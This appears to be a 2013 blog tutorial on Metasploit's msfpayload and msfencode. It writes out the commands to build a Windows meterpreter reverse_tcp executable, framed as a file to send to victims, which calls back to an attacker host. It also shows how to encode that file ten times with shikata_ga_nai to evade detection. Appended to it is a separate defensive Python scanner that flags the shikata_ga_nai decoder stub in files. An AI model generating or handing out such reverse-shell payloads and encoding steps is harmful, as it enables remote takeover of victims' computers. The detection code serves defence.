Tuesday, 4 June 2013


"msfpayload is a command-line instance of Metasploit that is used to generate and output all of the various types of shellcode that are available in Metasploit. The most common use of this tool is for the generation of shellcode for an exploit that is not currently in the Metasploit Framework or for testing different types of shellcode and options before finalizing a module." - http://www.offensive-security.com


Open the terminal and type in #msfpayload -l to list all the payloads available in the Metasploit Framework.

To view the summary and options of a specific payload, run
#msfpayload windows/meterpreter/reverse_tcp O

To create a payload (which will result in an executable for us to send to potential victims), do
#msfpayload windows/meterpreter/reverse_tcp LHOST= LPORT=443 R > /root/Desktop/Safekeep/reverse_tcp.exe

-) msfpayload (the tool)
-) windows/meterpreter/reverse_tcp (the payload)
-) LHOST= (the attacker machine IP, where you want the victim to connect to)
-) LPORT=443 (the port to connect to)
-) R (Raw format)
-) > (Output to)
-) /root/Desktop/Safekeep/reverse_tcp.exe (location/path)


"msfencode is another great little tool in the framework's arsenal when it comes to exploit development. Most of the time, one cannot simply use shellcode generated straight out of msfpayload. It needs to be encoded to suit the target in order to function properly. This can mean transforming your shellcode into pure alphanumeric, getting rid of bad characters or encoding it for 64 bit target."- http://www.offensive-security.com

Open the terminal and type in #msfencode -h to see the options.

To see all the possible encode methods, type #msfencode -l

Now let's encode the payload that we generated just now using msfpayload:
#msfencode -i /root/Desktop/Safekeep/reverse_tcp.exe -o /root/Desktop/Safekeep/encoded_reverse_tcp.exe -e x86/shikata_ga_nai -c 10 -t exe

Using MSFPAYLOAD and MSFENCODE together!

To do this, you don't have to perform the two steps above separately, because the command below does both in a single command.

#msfpayload windows/meterpreter/reverse_tcp LHOST= LPORT=443 R | msfencode -e x86/shikata_ga_nai -c 10 -t exe -o /root/Desktop/Safekeep/encoded_Attack.exe
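From the defender's side, what x86/shikata_ga_nai adds in front of the payload is a polymorphic decoder stub, and that stub finds its own address with an FPU "GetPC" trick: an x87 instruction followed by fnstenv [esp-0xc] (bytes D9 74 24 F4) and a pop into a register. The following scanner is an added example, not code from this post or from Metasploit; it flags that sequence in a file as a heuristic indicator, the same bytes that IDS shellcode signatures key on, and the samples it scans are constructed inline.

```python
"""Heuristic scanner for the x86/shikata_ga_nai decoder stub (added example)."""
import re
import sys

# fnstenv [esp-0xc]: the GetPC instruction the decoder stub uses to find its own address.
FNSTENV = re.compile(rb"\xd9\x74\x24\xf4")
# Escape-opcode range (D9..DF) of the x87 FPU instruction that precedes fnstenv in the stub.
FPU_LO, FPU_HI = 0xD9, 0xDF
# pop r32 opcodes (58..5F) that retrieve the saved instruction pointer.
POP_LO, POP_HI = 0x58, 0x5F

def find_getpc_stubs(data: bytes, window: int = 8) -> list:
    """Return offsets of fnstenv [esp-0xc] that look like a shikata_ga_nai GetPC stub.

    Heuristic (assumption): an FPU instruction within `window` bytes before
    fnstenv and a pop r32 within `window` bytes after it.  The stub's mov
    instructions may sit in between, so adjacency is not required.
    """
    hits = []
    for m in FNSTENV.finditer(data):
        before = data[max(0, m.start() - window):m.start()]
        after = data[m.end():m.end() + window]
        if any(FPU_LO <= b <= FPU_HI for b in before) and any(POP_LO <= b <= POP_HI for b in after):
            hits.append(m.start())
    return hits

# Constructed sample: nop; nop; fldz; fnstenv [esp-0xc]; mov ecx, 0x42; pop ebx; xor [ebx+0xe], ebx
SAMPLE_STUB = (b"\x90\x90" + b"\xd9\xee" + b"\xd9\x74\x24\xf4"
               + b"\xb9\x42\x00\x00\x00" + b"\x5b" + b"\x31\x5b\x0e" + b"\x90" * 4)
# Constructed benign data, and the fnstenv bytes alone (no FPU instruction before them) to show
# that the scanner does not fire on the four bytes in isolation.
SAMPLE_BENIGN = b"Hello, world\n" * 4
SAMPLE_LONE_FNSTENV = b"\x00" * 8 + b"\xd9\x74\x24\xf4\x5b"

def scan_file(path: str) -> list:
    """Scan a whole file (e.g. an encoded .exe) and return candidate stub offsets."""
    with open(path, "rb") as f:
        return find_getpc_stubs(f.read())

if __name__ == "__main__":
    target = sys.argv[1] if len(sys.argv) > 1 else None
    offsets = scan_file(target) if target else find_getpc_stubs(SAMPLE_STUB)
    for off in offsets:
        print(f"possible shikata_ga_nai GetPC stub at offset 0x{off:x}")
```

With -c 10 only the outermost decoder stub is in the clear, so a hit marks the first layer and the inner iterations stay hidden until the sample is run; treat a match as a trigger for sandboxing rather than a verdict.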
